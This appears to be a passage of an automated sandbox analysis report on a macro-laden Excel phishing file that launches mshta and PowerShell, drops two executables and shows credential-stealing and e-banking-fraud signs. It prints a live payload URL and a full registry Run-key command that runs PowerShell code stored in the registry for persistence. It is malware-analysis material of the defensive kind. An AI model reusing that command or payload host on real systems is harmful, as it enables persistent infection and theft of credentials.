          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: Vaccinerende.exe, 0000001C.00000003.782206298.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000001C.00000003.782247647.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000001C.00000003.782223915.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000001C.00000003.782756123.00000000003AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
          Source: powershell.exe, 00000007.00000002.449310498.000000001C553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
          Source: powershell.exe, 00000007.00000002.434786957.0000000002703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002BAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 0000000C.00000002.775886453.00000000001E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microso
          Source: dllhost.exe, 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, dllhost.exe, 0000000B.00000000.434267277.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000017.00000000.475272548.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, Vaccinerende.exe, 0000001C.00000000.717210149.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Vaccinerende.exe, 00000032.00000000.848787403.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Vaccinerende.exe, 00000039.00000000.901018571.000000000040A000.00000008.00000001.01000000.0000000D.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000007.00000002.445540287.0000000012531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C421000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: powershell.exe, 00000007.00000002.434786957.0000000002501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.781549529.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.937693979.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: Vaccinerende.exeString found in binary or memory: http://www.ebuddy.com
          Source: Vaccinerende.exeString found in binary or memory: http://www.imvu.com
          Source: Vaccinerende.exeString found in binary or memory: http://www.nirsoft.net/
          Source: powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: Vaccinerende.exeString found in binary or memory: https://login.yahoo.com/config/login
          Source: powershell.exe, 00000007.00000002.445540287.0000000012531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: mshta.exe, 00000004.00000002.414718403.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414241682.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471568642.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.460570080.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.471985501.00000000003E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/
          Source: mshta.exe, 0000000F.00000003.460570080.0000000000395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3
          Source: mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3&
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3C
          Source: mshta.exe, 0000000F.00000003.460570080.0000000000395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3W
          Source: mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3Z
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3s
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3w
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3yX
          Source: mshta.exe, 00000004.00000002.417244267.000000000332E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/ket
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C421000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: Vaccinerende.exe, 00000022.00000003.836175427.00000000021E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: Vaccinerende.exeString found in binary or memory: https://www.google.com
          Source: Vaccinerende.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_004053EF
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,34_2_0040987A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,34_2_004098E2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,35_2_00406DFC
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,35_2_00406E9F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,36_2_004068B5
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,36_2_004072B5
          Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud

          Source: Yara matchFile source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 3116, type: MEMORYSTR

          System Summary

          Source: PO 11001 .xlsOLE: Microsoft Excel 2007+
          Source: 54230000.0.drOLE: Microsoft Excel 2007+
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienetbookinetcahce[1].hta
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\dllhost.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Memory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,34_2_0040DD85
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00401806 NtdllDefWindowProc_W,34_2_00401806
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004018C0 NtdllDefWindowProc_W,34_2_004018C0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004016FD NtdllDefWindowProc_A,35_2_004016FD
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004017B7 NtdllDefWindowProc_A,35_2_004017B7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00402CAC NtdllDefWindowProc_A,36_2_00402CAC
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00402D66 NtdllDefWindowProc_A,36_2_00402D66
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040333D
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,23_2_0040333D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,33_2_0040333D
          Source: C:\Users\user\AppData\Roaming\dllhost.exe File created: C:\Windows\brandbombernes.lnk
          Source: PO 11001 .xlsOLE indicator, VBA macros: true
          Source: PO 11001 .xlsStream path 'MBD0001A431/\x1Ole' : https://og1.in/2Rxzb3y }'8koQD;Qi8_$=m>Lw|:KeDbzI%';dcfl`Hm)1@IMWb[X}hbd`KXZyK1JCrkMa1QsPD709cjaECVc5S9rr4O7xnndbEAP26WuKgDX5ISzgeCCUMyeqEDv17UOqDjuLrhhb25VA1ufgTBFc54gCSOf0Ta98rtRMmeFVCKbBx7JdudpjmJWsQxub2tZ2ZWRPUDnPkHFgRMp8pKlacM9xYL5HA20RUHAvmG6AuX12rnmIhTlvyE3ptVeGQp7QZzsucXDoTU9NqjwNksd5Si0H59obXupLBLg51Akg4s=CNW%3p+6DYNj
          Source: 54230000.0.drStream path 'MBD0001A431/\x1Ole' : https://og1.in/2Rxzb3y }'8koQD;Qi8_$=m>Lw|:KeDbzI%';dcfl`Hm)1@IMWb[X}hbd`KXZyK1JCrkMa1QsPD709cjaECVc5S9rr4O7xnndbEAP26WuKgDX5ISzgeCCUMyeqEDv17UOqDjuLrhhb25VA1ufgTBFc54gCSOf0Ta98rtRMmeFVCKbBx7JdudpjmJWsQxub2tZ2ZWRPUDnPkHFgRMp8pKlacM9xYL5HA20RUHAvmG6AuX12rnmIhTlvyE3ptVeGQp7QZzsucXDoTU9NqjwNksd5Si0H59obXupLBLg51Akg4s=CNW%3p+6DYNj
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: String function: 0040624C appears 34 times
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: String function: 00402C37 appears 52 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 004169A7 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 0044DB70 appears 41 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 004165FF appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00422297 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00444B5A appears 37 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413025 appears 79 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00416760 appears 69 times
          Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@72/66@4/5
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,34_2_004182CE
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,36_2_00410DE1
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040483D getwchar,GetDiskFreeSpaceW,MulDiv,11_2_0040483D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,34_2_00413D4C
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_004020FE CoCreateInstance,11_2_004020FE
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,34_2_0040B58D
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\54230000
